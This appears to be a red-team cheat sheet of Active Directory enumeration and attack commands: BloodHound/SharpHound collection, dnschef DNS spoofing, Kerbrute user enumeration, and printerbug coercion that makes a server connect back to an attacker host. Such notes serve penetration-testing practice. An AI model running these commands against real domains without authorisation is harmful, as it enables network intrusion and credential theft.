xct's notes
Search…
Domain Enum & Exploitation

Bloodhound

Standalone

1
Sharhound.exe -c all,gpolocalgroup
Copied!

Via Covenant

1
Assembly /assemblyname:"winsrv" /parameters:"\"-c All GPOLocalGroup\""
Copied!

Via Impacket

1
bloodhound-python -c all -u <user> -p <password> -d <domain> -dc <> -ns <optional nameserver>
Copied!
Sometimes this results in a dns timeout, in this case we can use dnschef.py:
1
sudo sh -c 'python3 dnschef.py --fakeip <dc ip> --fakedomains <domain> -q'
Copied!

ACLight

ACLight is a great script that finds high privileged accounts by using PowerView and then creates a report.

Find OS Versions

1
[Get-ADComputer -Filter {(OperatingSystem -like '*Server 2012*')} -Properties * | sort-Object | Select-Object DNSHostName, IPv4Address, whenCreated, OperatingSystem]
Copied!

Userenum

Kerbrute

1
kerbrute userenum -d <domain> <userlist> --dc <>
Copied!

Printerbug

Explore a flaw in msrpc to get a connect back from a vulnerable server via printerbug.py:
1
python printerbug.py <domain>/<user>@<rhost> <lhost>
Copied!

Read Remote Registry

We can read a remote machines registry with Service Ticket (which can be generated with "getST.py" if we have the creds or hash of a user) and "runas /netonly". This only works if the user we are targeting has a session on the target system (check in bloodhound).
Last modified 9mo ago